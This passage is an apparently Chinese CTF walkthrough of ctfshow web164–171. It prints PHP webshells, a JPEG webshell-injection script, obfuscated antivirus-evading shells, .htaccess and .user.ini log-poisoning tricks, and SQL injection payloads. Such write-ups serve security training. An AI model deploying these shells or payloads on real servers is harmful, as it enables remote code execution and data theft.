class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">$img = imagecreatetruecolor(<span class="number">32</span>, <span class="number">32</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> ($y = <span class="number">0</span>; $y &lt; sizeof($p); $y += <span class="number">3</span>) &#123;</span><br><span class="line">    $r = $p[$y];</span><br><span class="line">    $g = $p[$y+<span class="number">1</span>];</span><br><span class="line">    $b = $p[$y+<span class="number">2</span>];</span><br><span class="line">    $color = imagecolorallocate($img, $r, $g, $b);</span><br><span class="line">    imagesetpixel($img, round($y / <span class="number">3</span>), <span class="number">0</span>, $color);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">imagepng($img,<span class="string">'1.png'</span>);</span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210724105501375.png" alt="image-20210724105501375"></p>
<ul>
<li><strong>打开看看是否成功写入</strong></li>
</ul>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?</span>=$_GET[<span class="number">0</span>]($_POST[<span class="number">1</span>]);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210724105536362.png" alt="image-20210724105536362"></p>
<blockquote>
<ul>
<li><strong>直接上传，抓包，改post传参然后getflag</strong></li>
</ul>
</blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210724105922637.png" alt="image-20210724105922637"></p>
<h2 id="web165"><a href="#web165" class="headerlink" title="web165"></a>web165</h2><blockquote>
<ul>
<li><strong>这次变成jpg二次渲染，网上找大佬代码</strong></li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">	<span class="comment">/*</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">	The algorithm of injecting the payload into the JPG image, which will keep unchanged after transformations caused by PHP functions imagecopyresized() and imagecopyresampled().</span></span><br><span class="line"><span class="comment">	It is necessary that the size and quality of the initial image are the same as those of the processed image.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">	1) Upload an arbitrary image via secured files upload script</span></span><br><span class="line"><span class="comment">	2) Save the processed image and launch:</span></span><br><span class="line"><span class="comment">	jpg_payload.php &lt;jpg_name.jpg&gt;</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">	In case of successful injection you will get a specially crafted image, which should be uploaded again.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">	Since the most straightforward injection method is used, the following problems can occur:</span></span><br><span class="line"><span class="comment">	1) After the second processing the injected data may become partially corrupted.</span></span><br><span class="line"><span class="comment">	2) The jpg_payload.php script outputs "Something's wrong".</span></span><br><span class="line"><span class="comment">	If this happens, try to change the payload (e.g. add some symbols at the beginning) or try another initial image.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">	Sergey Bobrov <span class="doctag">@Black</span>2Fan.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">	See also:</span></span><br><span class="line"><span class="comment">	https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">	*/</span></span><br><span class="line"></span><br><span class="line">	$miniPayload = <span class="string">'&lt;?=eval($_POST[1]);?&gt;'</span>;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span>(!extension_loaded(<span class="string">'gd'</span>) || !function_exists(<span class="string">'imagecreatefromjpeg'</span>)) &#123;</span><br><span class="line">    	<span class="keyword">die</span>(<span class="string">'php-gd is not installed'</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	</span><br><span class="line">	<span class="keyword">if</span>(!<span class="keyword">isset</span>($argv[<span class="number">1</span>])) &#123;</span><br><span class="line">		<span class="keyword">die</span>(<span class="string">'php jpg_payload.php &lt;jpg_name.jpg&gt;'</span>);</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	set_error_handler(<span class="string">"custom_error_handler"</span>);</span><br><span class="line"></span><br><span class="line">	<span class="keyword">for</span>($pad = <span class="number">0</span>; $pad &lt; <span class="number">1024</span>; $pad++) &#123;</span><br><span class="line">		$nullbytePayloadSize = $pad;</span><br><span class="line">		$dis = <span class="keyword">new</span> DataInputStream($argv[<span class="number">1</span>]);</span><br><span class="line">		$outStream = file_get_contents($argv[<span class="number">1</span>]);</span><br><span class="line">		$extraBytes = <span class="number">0</span>;</span><br><span class="line">		$correctImage = <span class="keyword">TRUE</span>;</span><br><span class="line"></span><br><span class="line">		<span class="keyword">if</span>($dis-&gt;readShort() != <span class="number">0xFFD8</span>) &#123;</span><br><span class="line">			<span class="keyword">die</span>(<span class="string">'Incorrect SOI marker'</span>);</span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line">		<span class="keyword">while</span>((!$dis-&gt;eof()) &amp;&amp; ($dis-&gt;readByte() == <span class="number">0xFF</span>)) &#123;</span><br><span class="line">			$marker = $dis-&gt;readByte();</span><br><span class="line">			$size = $dis-&gt;readShort() - <span class="number">2</span>;</span><br><span class="line">			$dis-&gt;skip($size);</span><br><span class="line">			<span class="keyword">if</span>($marker === <span class="number">0xDA</span>) &#123;</span><br><span class="line">				$startPos = $dis-&gt;seek();</span><br><span class="line">				$outStreamTmp = </span><br><span class="line">					substr($outStream, <span class="number">0</span>, $startPos) . </span><br><span class="line">					$miniPayload . </span><br><span class="line">					str_repeat(<span class="string">"\0"</span>,$nullbytePayloadSize) . </span><br><span class="line">					substr($outStream, $startPos);</span><br><span class="line">				checkImage(<span class="string">'_'</span>.$argv[<span class="number">1</span>], $outStreamTmp, <span class="keyword">TRUE</span>);</span><br><span class="line">				<span class="keyword">if</span>($extraBytes !== <span class="number">0</span>) &#123;</span><br><span class="line">					<span class="keyword">while</span>((!$dis-&gt;eof())) &#123;</span><br><span class="line">						<span class="keyword">if</span>($dis-&gt;readByte() === <span class="number">0xFF</span>) &#123;</span><br><span class="line">							<span class="keyword">if</span>($dis-&gt;readByte !== <span class="number">0x00</span>) &#123;</span><br><span class="line">								<span class="keyword">break</span>;</span><br><span class="line">							&#125;</span><br><span class="line">						&#125;</span><br><span class="line">					&#125;</span><br><span class="line">					$stopPos = $dis-&gt;seek() - <span class="number">2</span>;</span><br><span class="line">					$imageStreamSize = $stopPos - $startPos;</span><br><span class="line">					$outStream = </span><br><span class="line">						substr($outStream, <span class="number">0</span>, $startPos) . </span><br><span class="line">						$miniPayload . </span><br><span class="line">						substr(</span><br><span class="line">							str_repeat(<span class="string">"\0"</span>,$nullbytePayloadSize).</span><br><span class="line">								substr($outStream, $startPos, $imageStreamSize),</span><br><span class="line">							<span class="number">0</span>,</span><br><span class="line">							$nullbytePayloadSize+$imageStreamSize-$extraBytes) . </span><br><span class="line">								substr($outStream, $stopPos);</span><br><span class="line">				&#125; <span class="keyword">elseif</span>($correctImage) &#123;</span><br><span class="line">					$outStream = $outStreamTmp;</span><br><span class="line">				&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">					<span class="keyword">break</span>;</span><br><span class="line">				&#125;</span><br><span class="line">				<span class="keyword">if</span>(checkImage(<span class="string">'payload_'</span>.$argv[<span class="number">1</span>], $outStream)) &#123;</span><br><span class="line">					<span class="keyword">die</span>(<span class="string">'Success!'</span>);</span><br><span class="line">				&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">					<span class="keyword">break</span>;</span><br><span class="line">				&#125;</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	unlink(<span class="string">'payload_'</span>.$argv[<span class="number">1</span>]);</span><br><span class="line">	<span class="keyword">die</span>(<span class="string">'Something\'s wrong'</span>);</span><br><span class="line"></span><br><span class="line">	<span class="function"><span class="keyword">function</span> <span class="title">checkImage</span><span class="params">($filename, $data, $unlink = FALSE)</span> </span>&#123;</span><br><span class="line">		<span class="keyword">global</span> $correctImage;</span><br><span class="line">		file_put_contents($filename, $data);</span><br><span class="line">		$correctImage = <span class="keyword">TRUE</span>;</span><br><span class="line">		imagecreatefromjpeg($filename);</span><br><span class="line">		<span class="keyword">if</span>($unlink)</span><br><span class="line">			unlink($filename);</span><br><span class="line">		<span class="keyword">return</span> $correctImage;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="function"><span class="keyword">function</span> <span class="title">custom_error_handler</span><span class="params">($errno, $errstr, $errfile, $errline)</span> </span>&#123;</span><br><span class="line">		<span class="keyword">global</span> $extraBytes, $correctImage;</span><br><span class="line">		$correctImage = <span class="keyword">FALSE</span>;</span><br><span class="line">		<span class="keyword">if</span>(preg_match(<span class="string">'/(\d+) extraneous bytes before marker/'</span>, $errstr, $m)) &#123;</span><br><span class="line">			<span class="keyword">if</span>(<span class="keyword">isset</span>($m[<span class="number">1</span>])) &#123;</span><br><span class="line">				$extraBytes = (int)$m[<span class="number">1</span>];</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="class"><span class="keyword">class</span> <span class="title">DataInputStream</span> </span>&#123;</span><br><span class="line">		<span class="keyword">private</span> $binData;</span><br><span class="line">		<span class="keyword">private</span> $order;</span><br><span class="line">		<span class="keyword">private</span> $size;</span><br><span class="line"></span><br><span class="line">		<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">($filename, $order = false, $fromString = false)</span> </span>&#123;</span><br><span class="line">			<span class="keyword">$this</span>-&gt;binData = <span class="string">''</span>;</span><br><span class="line">			<span class="keyword">$this</span>-&gt;order = $order;</span><br><span class="line">			<span class="keyword">if</span>(!$fromString) &#123;</span><br><span class="line">				<span class="keyword">if</span>(!file_exists($filename) || !is_file($filename))</span><br><span class="line">					<span class="keyword">die</span>(<span class="string">'File not exists ['</span>.$filename.<span class="string">']'</span>);</span><br><span class="line">				<span class="keyword">$this</span>-&gt;binData = file_get_contents($filename);</span><br><span class="line">			&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">				<span class="keyword">$this</span>-&gt;binData = $filename;</span><br><span class="line">			&#125;</span><br><span class="line">			<span class="keyword">$this</span>-&gt;size = strlen(<span class="keyword">$this</span>-&gt;binData);</span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line">		<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">seek</span><span class="params">()</span> </span>&#123;</span><br><span class="line">			<span class="keyword">return</span> (<span class="keyword">$this</span>-&gt;size - strlen(<span class="keyword">$this</span>-&gt;binData));</span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line">		<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">skip</span><span class="params">($skip)</span> </span>&#123;</span><br><span class="line">			<span class="keyword">$this</span>-&gt;binData = substr(<span class="keyword">$this</span>-&gt;binData, $skip);</span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line">		<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">readByte</span><span class="params">()</span> </span>&#123;</span><br><span class="line">			<span class="keyword">if</span>(<span class="keyword">$this</span>-&gt;eof()) &#123;</span><br><span class="line">				<span class="keyword">die</span>(<span class="string">'End Of File'</span>);</span><br><span class="line">			&#125;</span><br><span class="line">			$byte = substr(<span class="keyword">$this</span>-&gt;binData, <span class="number">0</span>, <span class="number">1</span>);</span><br><span class="line">			<span class="keyword">$this</span>-&gt;binData = substr(<span class="keyword">$this</span>-&gt;binData, <span class="number">1</span>);</span><br><span class="line">			<span class="keyword">return</span> ord($byte);</span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line">		<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">readShort</span><span class="params">()</span> </span>&#123;</span><br><span class="line">			<span class="keyword">if</span>(strlen(<span class="keyword">$this</span>-&gt;binData) &lt; <span class="number">2</span>) &#123;</span><br><span class="line">				<span class="keyword">die</span>(<span class="string">'End Of File'</span>);</span><br><span class="line">			&#125;</span><br><span class="line">			$short = substr(<span class="keyword">$this</span>-&gt;binData, <span class="number">0</span>, <span class="number">2</span>);</span><br><span class="line">			<span class="keyword">$this</span>-&gt;binData = substr(<span class="keyword">$this</span>-&gt;binData, <span class="number">2</span>);</span><br><span class="line">			<span class="keyword">if</span>(<span class="keyword">$this</span>-&gt;order) &#123;</span><br><span class="line">				$short = (ord($short[<span class="number">1</span>]) &lt;&lt; <span class="number">8</span>) + ord($short[<span class="number">0</span>]);</span><br><span class="line">			&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">				$short = (ord($short[<span class="number">0</span>]) &lt;&lt; <span class="number">8</span>) + ord($short[<span class="number">1</span>]);</span><br><span class="line">			&#125;</span><br><span class="line">			<span class="keyword">return</span> $short;</span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line">		<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">eof</span><span class="params">()</span> </span>&#123;</span><br><span class="line">			<span class="keyword">return</span> !<span class="keyword">$this</span>-&gt;binData||(strlen(<span class="keyword">$this</span>-&gt;binData) === <span class="number">0</span>);</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></div>

<blockquote>
<ul>
<li><strong>上传一个jpg图片，因为有些图片的成功率不太高，就直接用可以成功的图片，找了个国光老师的图片，原图</strong></li>
</ul>
</blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/jpg%E6%B8%B2%E6%9F%93.jpg" alt="jpg渲染"></p>
<blockquote>
<ul>
<li><strong>先上传这个图片，让这个图片被渲染，然后下载下来，格式改jgp</strong></li>
</ul>
</blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210724112625357.png" alt="image-20210724112625357"></p>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210724112815685.png" alt="image-20210724112815685"></p>
<blockquote>
<ul>
<li>上传，抓包记得我们写的一句话是</li>
</ul>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?</span>=<span class="keyword">eval</span>($_POST[<span class="number">1</span>]);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></div>
</blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210724112904880.png" alt="image-20210724112904880"></p>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210724113008986.png" alt="image-20210724113008986"></p>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210724113107225.png" alt="image-20210724113107225"></p>
<h2 id="web166"><a href="#web166" class="headerlink" title="web166"></a>web166</h2><blockquote>
<ul>
<li><strong>查看源码发现只能穿zip</strong></li>
</ul>
</blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210724140634097.png" alt="image-20210724140634097"></p>
<blockquote>
<ul>
<li><strong>抓包，直接给zip上传一句话木马；</strong></li>
<li>注意：<strong>Content-Type为application/x-zip-compressed</strong></li>
</ul>
</blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210724142043177.png" alt="image-20210724142043177"></p>
<blockquote>
<ul>
<li><strong>抓刚刚传进去的文件，根据zip文件上传的文件包含的特性直接命令执行</strong></li>
</ul>
</blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210724142204934.png" alt="image-20210724142204934"></p>
<h2 id="web167"><a href="#web167" class="headerlink" title="web167"></a>web167</h2><blockquote>
<ul>
<li>根据提示说httpd,想到是<strong>.htaccess</strong>,应该是要利用.htaccess进行绕过</li>
<li><strong>htaccess文件是Apache服务器中的一个配置文件，它负责相关目录下的网页配置。通过htaccess文件，可以帮我们实现：网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能</strong></li>
</ul>
</blockquote>
<ul>
<li><strong>方法一</strong></li>
</ul>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">AddType application&#x2F;x-httpd-php .jpg &#x2F;&#x2F;将.jpg后缀解析成php执行</span><br></pre></td></tr></table></figure></div>

<ul>
<li>方法二</li>
</ul>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;FilesMatch &quot;png&quot;&gt;</span><br><span class="line">SetHandler application&#x2F;x-httpd-php</span><br><span class="line">&lt;&#x2F;FilesMatch&gt;</span><br></pre></td></tr></table></figure></div>

<blockquote>
<ul>
<li><strong>两个方法一个意思两种写法，这里用方法一，上传.htaccess</strong></li>
</ul>
</blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210724143059388.png" alt="image-20210724143059388"></p>
<blockquote>
<ul>
<li><strong>在上传一个1.jpg的一句话木马</strong></li>
</ul>
</blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210724143222669.png" alt="image-20210724143222669"></p>
<blockquote>
<ul>
<li>直接打开1.jpg的图片拿flag</li>
</ul>
</blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210724143341786.png" alt="image-20210724143341786"></p>
<h2 id="web168"><a href="#web168" class="headerlink" title="web168"></a>web168</h2><blockquote>
<ul>
<li>提示说基础免杀，这里提供几个基础的免杀脚本</li>
</ul>
</blockquote>
<ul>
<li><strong>前三个免杀 密码 0</strong>  <strong>最后一个自己构造</strong></li>
</ul>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$a = <span class="string">"s#y#s#t#e#m"</span>;</span><br><span class="line">$b = explode(<span class="string">"#"</span>,$a);</span><br><span class="line">$c = $b[<span class="number">0</span>].$b[<span class="number">1</span>].$b[<span class="number">2</span>].$b[<span class="number">3</span>].$b[<span class="number">4</span>].$b[<span class="number">5</span>];</span><br><span class="line">$c($_REQUEST[<span class="number">0</span>]);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></div>

<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$a=substr(<span class="string">'1s'</span>,<span class="number">1</span>).<span class="string">'ystem'</span>;  </span><br><span class="line">$a($_REQUEST[<span class="number">0</span>]);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></div>

<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$a=strrev(<span class="string">'metsys'</span>); <span class="comment">//反转</span></span><br><span class="line">$a($_REQUEST[<span class="number">0</span>]);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></div>

<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$a=$_REQUEST[<span class="string">'a'</span>];</span><br><span class="line">$b=$_REQUEST[<span class="string">'b'</span>];</span><br><span class="line">$a($b);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></div>

<ul>
<li>抓包上传</li>
</ul>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210724145000996.png" alt="image-20210724145000996"></p>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210724145218511.png" alt="image-20210724145218511"></p>
<h2 id="web169"><a href="#web169" class="headerlink" title="web169"></a>web169</h2><blockquote>
<ul>
<li><strong>右键源码查看前端限制只能上传zip，先上传一个zip，然后抓包，改<code>Content-Type</code>为<code>image/png</code>，可以传php等格式，但发现内容中过滤了<code>&lt;&gt;</code>和<code>php</code>，试了下可以传<code>.user.ini</code>，我们尝试一下日志包含，<code>User-Agent</code>加上一句话木马</strong></li>
</ul>
</blockquote>
<ul>
<li><strong>.user.ini</strong></li>
</ul>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">auto_prepend_file&#x3D;&#x2F;var&#x2F;log&#x2F;nginx&#x2F;access.log</span><br></pre></td></tr></table></figure></div>

<ul>
<li><strong>1.php</strong></li>
</ul>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210724145745539.png" alt="image-20210724145745539"></p>
<ul>
<li><strong>访问1.php发现成功包含</strong></li>
</ul>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210724145854727.png" alt="image-20210724145854727"></p>
<ul>
<li><p><strong>随便访问一个页面写一个User-Agent</strong></p>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210724150029046.png" alt="image-20210724150029046"></p>
</li>
<li><p><strong>测试phpinfo();</strong></p>
</li>
</ul>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210724150124088.png" alt="image-20210724150124088"></p>
<ul>
<li><strong>直接连webshell找flag或者直接命令执行</strong></li>
</ul>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210724150419763.png" alt="image-20210724150419763"></p>
<h2 id="web170"><a href="#web170" class="headerlink" title="web170"></a>web170</h2><blockquote>
<ul>
<li>和上题一样</li>
</ul>
</blockquote>
<h1 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h1><h2 id="web171"><a href="#web171" class="headerlink" title="web171"></a>web171</h2><blockquote>
<ul>
<li><strong>根据语句可以看到有flag没有被显示出来，让我们拼接语句来绕过</strong></li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;&#x2F;拼接sql语句查找指定ID用户</span><br><span class="line">$sql &#x3D; &quot;select username,password from user where username !&#x3D;&#39;flag&#39; and id &#x3D; &#39;&quot;.$_GET[&#39;id&#39;].&quot;&#39; limit 1;&quot;;</span><br></pre></td></tr></table></figure></div>

<ul>
<li><strong>GET传参会自己解码，注释可以用%23（#）, –空格,–+等，或者拼接语句不用注释也行</strong></li>
</ul>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210727052118542.png" alt="image-20210727052118542"></p>
<ul>
<li><strong>判断有3个字段</strong></li>
</ul>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1' order by 3<span class="comment">--+</span></span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210727052202385.png" alt="image-20210727052202385"></p>
<ul>
<li><strong>联合查询，查表</strong></li>
</ul>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1' union <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="keyword">group_concat</span>(table_name) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=<span class="keyword">database</span>() <span class="comment">--+</span></span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210727052424376.png" alt="image-20210727052424376"></p>
<ul>
<li>查字段</li>
</ul>
